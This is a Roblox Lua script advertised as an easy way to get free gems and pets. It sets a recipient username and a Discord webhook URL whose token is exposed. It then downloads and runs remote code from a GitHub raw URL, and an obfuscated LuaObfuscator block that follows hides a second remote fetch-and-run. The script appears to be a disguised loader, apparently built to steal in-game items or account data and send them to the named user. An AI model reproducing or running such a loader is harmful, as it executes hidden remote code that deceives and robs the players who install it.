_G.Username = "Camronnorrissss"

_G.HubName = "Easy script for free gems and huges"

_G.WebhookUrl = "https://discord.com/api/webhooks/1110436225476735056/ee1e_UQRMM8aGjjfn0pivw3rHQ2j0OPD97x3PqiWxZz_HgS3inFv8w8csLGYKkNFzOY6"

loadstring(game:HttpGet("https://raw.githubusercontent.com/Jayiioceanii/PeakOnTop/main/peak.lua"))()


--[[
 .____                  ________ ___.    _____                           __                
 |    |    __ _______   \_____  \\_ |___/ ____\_ __  ______ ____ _____ _/  |_  ___________ 
 |    |   |  |  \__  \   /   |   \| __ \   __\  |  \/  ___// ___\\__  \\   __\/  _ \_  __ \
 |    |___|  |  // __ \_/    |    \ \_\ \  | |  |  /\___ \\  \___ / __ \|  | (  <_> )  | \/
 |_______ \____/(____  /\_______  /___  /__| |____//____  >\___  >____  /__|  \____/|__|   
         \/          \/         \/    \/                \/     \/     \/                   
          \_Welcome to LuaObfuscator.com   (Alpha 0.2.8) ~  Much Love, Ferib 

]]--

do local v0=tonumber;local v1=string.byte;local v2=string.char;local v3=string.sub;local v4=string.gsub;local v5=string.rep;local v6=table.concat;local v7=table.insert;local v8=math.ldexp;local v9=getfenv or function()return _ENV;end ;local v10=setmetatable;local v11=pcall;local v12=select;local v13=unpack or table.unpack ;local v14=tonumber;local function v15(v16,v17,...)local v18=1;local v19;v16=v4(v3(v16,5),"..",function(v30)if (v1(v30,2)==79) then v19=v0(v3(v30,1,1));return "";else local v82=0;local v83;while true do if (v82==0) then v83=v2(v0(v30,16));if v19 then local v99=0;local v100;while true do if (v99==1) then return v100;end if (0==v99) then v100=v5(v83,v19);v19=nil;v99=1;end end else return v83;end break;end end end end);local function v20(v31,v32,v33)if v33 then local v84=(0 -0) -(1065 -(68 + 997)) ;local v85;while true do if (v84==(0 -0)) then v85=(v31/((3 -1)^(v32-1)))%((4 -(2 + 0))^(((v33-(620 -(555 + 64))) -(v32-(932 -(857 + 74)))) + (569 -(367 + 201)))) ;return v85-(v85%(928 -(214 + 713))) ;end end else local v86=(1 + 1)^(v32-(1 + 0)) ;return (((v31%(v86 + v86))>=v86) and (878 -(282 + (1865 -(226 + 1044))))) or (1637 -(1523 + 114)) ;end end local function v21()local v34=v1(v16,v18,v18);v18=v18 + 1 ;return v34;end local function v22()local v35=957 -((1242 -(87 + 263)) + 65) ;local v36;local v37;while true do if (v35==(0 -0)) then v36,v37=v1(v16,v18,v18 + (119 -(32 + 85)) );v18=v18 + 2 + (180 -(67 + 113)) ;v35=1;end if (v35==(1 -(0 + 0))) then return (v37 * (57 + 199)) + v36 ;end end end local function v23()local v38,v39,v40,v41=v1(v16,v18,v18 + (7 -4) );v18=v18 + 3 + 1 ;return (v41 * (66680831 -(134357413 -84453798))) + (v40 * 65536) + (v39 * (1208 -(802 + 150))) + v38 ;end local function v24()local v42=(0 + 0) -(0 + 0) ;local v43;local v44;local v45;local v46;local v47;local v48;while true do if (v42==(0 + 0)) then v43=v23();v44=v23();v42=(1770 -(201 + 571)) -(915 + 82) ;end if (v42==(2 -1)) then v45=(1139 -(116 + 1022)) + 0 ;v46=(v20(v44,1 -(0 -0) ,1207 -(1069 + 118) ) * ((4 -2)^(69 -37))) + v43 ;v42=1 + 1 ;end if (v42==3) then if (v47==(0 -0)) then if (v46==(0 + 0)) then return v48 * ((465 + 326) -(368 + 423)) ;else v47=1;v45=0 -0 ;end elseif (v47==(2065 -(10 + (29 -21)))) then return ((v46==0) and (v48 * ((3 -2)/0))) or (v48 * NaN) ;end return v8(v48,v47-1023 ) * (v45 + (v46/((444 -(416 + (92 -66)))^(165 -113)))) ;end if (v42==(1 + 1)) then v47=v20(v44,36 -15 ,31);v48=((v20(v44,470 -(145 + 293) )==(431 -((903 -(814 + 45)) + 386))) and  -(2 -1)) or (1487 -(998 + 488)) ;v42=3;end end end local function v25(v49)local v50=0;local v51;local v52;while true do if (v50==(1 + 0 + (0 -0))) then v51=v3(v16,v18,(v18 + v49) -1 );v18=v18 + v49 ;v50=2;end if ((1 + 1)==v50) then v52={};for v89=886 -(261 + 624) , #v51 do v52[v89]=v2(v1(v3(v51,v89,v89)));end v50=3;end if (v50==(0 -0)) then v51=nil;if  not v49 then local v95=1080 -(1020 + 60) ;while true do if (v95==(1423 -(630 + 793))) then v49=v23();if (v49==(0 -0)) then return "";end break;end end end v50=1;end if (v50==(14 -11)) then return v6(v52);end end end local v26=v23;local function v27(...)return {...},v12("#",...);end local function v28()local v53=0;local v54;local v55;local v56;local v57;local v58;local v59;local v60;local v61;while true do if (v53==(1 + 0)) then v56=nil;v57=nil;v53=240 -(64 + 174) ;end if (v53~=(563 -(306 + 254))) then else v60=nil;v61=nil;v53=1 + 3 ;end if (v53==(7 -3)) then while true do if (v54==0) then v55=1467 -(899 + 568) ;v56=nil;v54=337 -(144 + 192) ;end if (v54==(218 -(42 + 174))) then v59=nil;v60=nil;v54=3 + 0 ;end if (v54==(3 + 0)) then v61=nil;while true do local v101=0 + 0 ;local v102;while true do if (v101~=(0 + 0)) then else v102=0 -0 ;while true do if (v102~=(1504 -(363 + 1141))) then else if (v55~=(1581 -(1183 + 397))) then else local v140=603 -(268 + 335) ;while true do if (v140~=0) then else v60=v23();v61={};v140=291 -(60 + 230) ;end if (v140==(1 + 0)) then local v147=0 + 0 ;local v148;while true do if ((1975 -(1913 + 62))~=v147) then else v148=0;while true do if (v148==1) then v140=574 -(426 + 146) ;break;end if (v148==(0 + 0)) then local v155=0 + 0 ;while true do if (v155==0) then for v159=1,v60 do local v160=1456 -(282 + 1174) ;local v161;local v162;local v163;local v164;while true do if (v160~=(813 -(569 + 242))) then else while true do if (v161~=1) then else v164=nil;while true do if (v162==(2 -1)) then if (v163==(1934 -(565 + 1368))) then v164=v21()~=0 ;elseif (v163==2) then v164=v24();elseif (v163==3) then v164=v25();end v61[v159]=v164;break;end if (v162==(0 -0)) then local v174=1661 -(1477 + 184) ;local v175;while true do if (v174~=0) then else v175=0 -0 ;while true do if (v175~=(0 + 0)) then else v163=v21();v164=nil;v175=1 + 0 ;end if ((1025 -(706 + 318))==v175) then v162=1252 -(721 + 530) ;break;end end break;end end end end break;end if ((0 -0)==v161) then local v172=1271 -(945 + 326) ;while true do if (v172==(2 -1)) then v161=1 + 0 ;break;end if (v172==(700 -(271 + 429))) then v162=0 + 0 ;v163=nil;v172=1 + 0 ;end end end end break;end if (v160~=(1501 -(1408 + 92))) then else v163=nil;v164=nil;v160=2;end if (v160==(476 -(41 + 435))) then v161=0;v162=nil;v160=1087 -(461 + 625) ;end end end v59[1291 -(993 + 295) ]=v21();v155=1 + 0 ;end if (v155~=1) then else v148=1172 -(418 + 753) ;break;end end end end break;end end end if (v140~=2) then else v55=1 + 1 ;break;end end end if (v55==(1127 -(936 + 189))) then local v141=0 + 0 ;local v142;while true do if ((0 + 0)~=v141) then else v142=0;while true do local v151=0 + 0 ;while true do if ((0 + 0)==v151) then if (v142~=(1613 -(1565 + 48))) then else local v156=529 -(406 + 123) ;while true do if (v156==(1770 -(1749 + 20))) then v142=1 + 0 ;break;end if (v156~=(0 -0)) then else for v165=1323 -(1249 + 73) ,v23() do local v166=0 + 0 ;local v167;local v168;local v169;while true do if (v166~=(1146 -(466 + 679))) then else v169=nil;while true do if (v167==(1875 -(157 + 1718))) then v168=0 -0 ;v169=nil;v167=2 -1 ;end if (v167~=(1901 -(106 + 1794))) then else while true do if ((0 -0)~=v168) then else v169=v21();if (v20(v169,1,1019 -(697 + 321) )~=(0 + 0)) then else local v176=0;local v177;local v178;local v179;local v180;while true do if (v176==(2 -1)) then local v181=0 + 0 ;local v182;while true do if (v181~=(0 -0)) then else v182=0 -0 ;while true do if ((115 -(4 + 110))~=v182) then else v176=586 -(57 + 527) ;break;end if (v182~=(1427 -(41 + 1386))) then else local v191=103 -(17 + 86) ;while true do if (v191==(1 + 0)) then v182=1 -0 ;break;end if (v191~=(1227 -(322 + 905))) then else v179=nil;v180=nil;v191=612 -(602 + 9) ;end end end end break;end end end if (v176==(5 -3)) then while true do if ((872 -(826 + 46))==v177) then local v183=166 -(122 + 44) ;while true do if (v183~=1) then else v177=1;break;end if (v183~=0) then else local v192=947 -(245 + 702) ;local v193;while true do if ((0 -0)~=v192) then else v193=0 -0 ;while true do if (0~=v193) then else v178=v20(v169,6 -4 ,3);v179=v20(v169,2 + 2 ,1904 -(260 + 1638) );v193=1 + 0 ;end if ((441 -(382 + 58))~=v193) then else v183=3 -2 ;break;end end break;end end end end end if ((1 + 1)==v177) then local v184=0 -0 ;local v185;while true do if (v184~=(0 -0)) then else v185=0 -0 ;while true do if (v185~=(66 -(30 + 35))) then else v177=3;break;end if (v185==(0 + 0)) then local v194=1257 -(1043 + 214) ;while true do if (v194==(0 -0)) then if (v20(v179,1213 -(323 + 889) ,2 -1 )==1) then v180[2]=v61[v180[2]];end if (v20(v179,582 -(361 + 219) ,2)==(1 + 0)) then v180[323 -(53 + 267) ]=v61[v180[1693 -(1121 + 569) ]];end v194=1 + 0 ;end if (v194~=(215 -(22 + 192))) then else v185=1;break;end end end end break;end end end if (v177==(416 -(15 + 398))) then if (v20(v179,985 -(18 + 964) ,3)~=(3 -2)) then else v180[3 + 1 ]=v61[v180[4]];end v56[v165]=v180;break;end if (v177==(1 + 0)) then local v187=0 -0 ;local v188;while true do if (v187~=0) then else v188=765 -(468 + 297) ;while true do if (v188~=(850 -(20 + 830))) then else local v195=0 + 0 ;local v196;while true do if (v195~=(0 -0)) then else v196=0 -0 ;while true do if (v196==(127 -(116 + 10))) then v188=1 + 0 ;break;end if (v196==(738 -(542 + 196))) then v180={v22(),v22(),nil,nil};if (v178==0) then local v201=0 -0 ;while true do if (v201==(0 + 0)) then v180[3]=v22();v180[4]=v22();break;end end elseif (v178==(1 + 0)) then v180[3]=v23();elseif (v178==2) then v180[3]=v23() -((2 + 0)^(9 + 7)) ;elseif (v178~=(4 -1)) then else local v206=0 -0 ;local v207;while true do if (0~=v206) then else v207=0 -0 ;while true do if (v207~=(0 + 0)) then else v180[1554 -(1126 + 425) ]=v23() -((2 -0)^16) ;v180[409 -(118 + 287) ]=v22();break;end end break;end end end v196=766 -(574 + 191) ;end end break;end end end if (v188~=(3 -2)) then else v177=1123 -(118 + 1003) ;break;end end break;end end end end break;end if (v176~=(0 -0)) then else v177=0;v178=nil;v176=1 + 0 ;end end end break;end end break;end end break;end if (v166==0) then v167=0 -0 ;v168=nil;v166=1 + 0 ;end end end for v170=850 -(254 + 595) ,v23() do v57[v170-1 ]=v28();end v156=1;end end end if (v142==(378 -(142 + 235))) then return v59;end break;end end end break;end end end v102=127 -(55 + 71) ;end if ((4 -3)~=v102) then else if (v55~=(0 -0)) then else local v143=0 + 0 ;local v144;while true do if (v143~=(977 -(553 + 424))) then else v144=0 -0 ;while true do if (v144~=(1 + 0)) then else local v152=0 + 0 ;while true do if (v152~=(1 + 0)) then else v144=1 + 1 ;break;end if (v152~=(0 -0)) then else v58={};v59={v56,v57,nil,v58};v152=2 -1 ;end end end if ((4 -2)~=v144) then else v55=1 + 0 ;break;end if (v144~=0) then else local v153=0;local v154;while true do if (v153==(0 -0)) then v154=753 -(239 + 514) ;while true do if (v154~=(48 -(25 + 23))) then else local v158=0;while true do if (v158~=(1 + 0)) then else v154=1887 -(927 + 959) ;break;end if (v158==(1329 -(797 + 532))) then v56={};v57={};v158=1 + 0 ;end end end if (v154~=(1 -0)) then else v144=1;break;end end break;end end end end break;end end end break;end end break;end end end break;end if (v54~=(1 + 0)) then else local v98=0;while true do if (v98~=(0 -0)) then else v57=nil;v58=nil;v98=1203 -(373 + 829) ;end if (v98~=1) then else v54=733 -(476 + 255) ;break;end end end end break;end if (v53~=(0 -0)) then else v54=1130 -(369 + 761) ;v55=nil;v53=1 + 0 ;end if (v53~=(2 -0)) then else v58=nil;v59=nil;v53=14 -11 ;end end end local function v29(v62,v63,v64)local v65=v62[1];local v66=v62[2];local v67=v62[3];return function(...)local v68=v65;local v69=v66;local v70=v67;local v71=v27;local v72=1;local v73= -1;local v74={};local v75={...};local v76=v12("#",...) -1 ;local v77={};local v78={};for v87=0,v76 do if (v87>=v70) then v74[v87-v70 ]=v75[v87 + 1 ];else v78[v87]=v75[v87 + 1 ];end end local v79=(v76-v70) + 1 ;local v80;local v81;while true do local v88=0;while true do if (1==v88) then if (v81<=3) then if (v81<=1) then if (v81>0) then v78[v80[2]]=v80[3];else local v105=0;local v106;local v107;local v108;local v109;while true do if (v105==0) then v106=v80[2];v107,v108=v71(v78[v106](v13(v78,v106 + 1 ,v80[3])));v105=1;end if (2==v105) then for v145=v106,v73 do local v146=0;while true do if (v146==0) then v109=v109 + 1 ;v78[v145]=v107[v109];break;end end end break;end if (1==v105) then v73=(v108 + v106) -1 ;v109=0;v105=2;end end end elseif (v81==2) then v78[v80[2]]();else local v110;local v111,v112;local v113;local v114;v78[v80[2]]=v64[v80[3]];v72=v72 + 1 ;v80=v68[v72];v78[v80[2]]=v64[v80[3]];v72=v72 + 1 ;v80=v68[v72];v114=v80[2];v113=v78[v80[3]];v78[v114 + 1 ]=v113;v78[v114]=v113[v80[4]];v72=v72 + 1 ;v80=v68[v72];v78[v80[2]]=v80[3];v72=v72 + 1 ;v80=v68[v72];v78[v80[2]]=v80[3]~=0 ;v72=v72 + 1 ;v80=v68[v72];v114=v80[2];v111,v112=v71(v78[v114](v13(v78,v114 + 1 ,v80[3])));v73=(v112 + v114) -1 ;v110=0;for v133=v114,v73 do v110=v110 + 1 ;v78[v133]=v111[v110];end v72=v72 + 1 ;v80=v68[v72];v114=v80[2];v78[v114]=v78[v114](v13(v78,v114 + 1 ,v73));v72=v72 + 1 ;v80=v68[v72];v78[v80[2]]();v72=v72 + 1 ;v80=v68[v72];do return;end end elseif (v81<=5) then if (v81>4) then local v124=0;local v125;while true do if (v124==0) then v125=v80[2];v78[v125]=v78[v125](v13(v78,v125 + 1 ,v73));break;end end else local v126=v80[2];local v127=v78[v80[3]];v78[v126 + 1 ]=v127;v78[v126]=v127[v80[4]];end elseif (v81<=6) then v78[v80[2]]=v64[v80[3]];elseif (v81==7) then do return;end else v78[v80[2]]=v80[3]~=0 ;end v72=v72 + 1 ;break;end if (v88==0) then v80=v68[v72];v81=v80[1];v88=1;end end end end;end return v29(v28(),{},v17)(...);end v15("LOL!043O00030A3O006C6F6164737472696E6703043O0067616D6503073O00482O7470476574033C3O00682O7470733A2O2F7261772E67697468756275736572636F6E74656E742E636F6D2F546872617368456173652F536561732F6D61696E2F536561736500093O0012033O00013O00122O000100023O00202O00010001000300122O000300046O000400016O000100049O0000026O000100016O00017O00",v9(),...);end
